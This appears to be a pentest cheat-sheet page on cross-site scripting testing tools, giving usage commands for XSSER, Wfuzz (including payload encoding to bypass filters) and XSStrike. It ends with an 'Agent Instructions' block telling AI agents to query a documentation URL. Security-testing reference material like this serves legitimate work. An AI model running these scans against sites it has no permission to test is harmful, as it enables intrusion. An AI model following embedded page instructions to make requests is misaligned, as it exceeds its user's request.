# Cross-Site Scripting (XSS) ## XSSER ``` xsser --auto= --cookie= ``` ## WFUZZ Wfuzz is another popular tool used to fuzz applications not only for XSS vulnerabilities, but also SQL injections, hidden directories, form parameters, and more. It is included in Kali by default. Basic usage of Wfuzz includes specifying a wordlist file including the payloads to use with the **-z** flag, and the URL to test, replacing the parameter in question with **FUZZ**. We can also set the **-c** flag to get color output. ``` wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt http://domain.com/application/index.php?page=FUZZ ``` Also of use, when fuzzing an application where many different response codes might be encountered, the **--hc** flag can be utilized to ignore certain responses, such as 404 codes. Another helpful feature of Wfuzz is the ability to encode payloads in order to bypass defensive filters more effectively. Simply append the desired encoder (in this case urlencode) to the specified file, separated by a comma, to encode the payloads. ``` wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt,urlencode http://domain.com/application/index.php?page=FUZZ ``` ## XSStrike It is a dedicated suite for detecting cross-site scripting vulnerabilities that includes an intelligent payload generator, a fuzzer, a crawler, WAF detection, and more. XSStrike is currently in beta. {% code overflow="wrap" lineNumbers="true" fullWidth="true" %} ```bash git clone https://github.com/s0md3v/XSStrike cd XSStrike pip3 install -r requirements.txt ``` {% endcode %} This tool begins by checking for DOM-based XSS vulnerabilities, and the potentially vulnerable parameters are displayed on the screen. Reflected XSS is tested for next, and the interactive payload generator displays the payload and the projected likelihood of success. To continue scanning, hit **y** at the prompt. ### Scan a single URL Option: `-u` or `--url`. Test a single webpage which uses GET method. {% code overflow="wrap" lineNumbers="true" fullWidth="true" %} ```bash python xsstrike.py -u "http://example.com/search.php?q=query" ``` {% endcode %} ### Supplying POST data python {% code overflow="wrap" lineNumbers="true" fullWidth="true" %} ```bash xsstrike.py -u "http://example.com/search.php" --data "q=query" ``` {% endcode %} ### Supply HTTP headers Option: `--headers`. This option will open your text editor (default is 'nano') and you can simply paste your HTTP headers and press `Ctrl + S` to save.
If your operating system doesn't support this or you don't want to do this anyway, you can simply add headers from command line separated by as follows: {% code overflow="wrap" lineNumbers="true" fullWidth="false" %} ```bash python xsstrike.py -u "http://example.com/page.php?q=query" --headers "Accept-Language: en-US\nCookie: null" --file-log-level DEBUG --log-file output.log ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pcastagnaro.gitbook.io/pentest-bug-bounty-resources/pentest-bounty-resources/web/injection/cross-site-scripting-xss.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.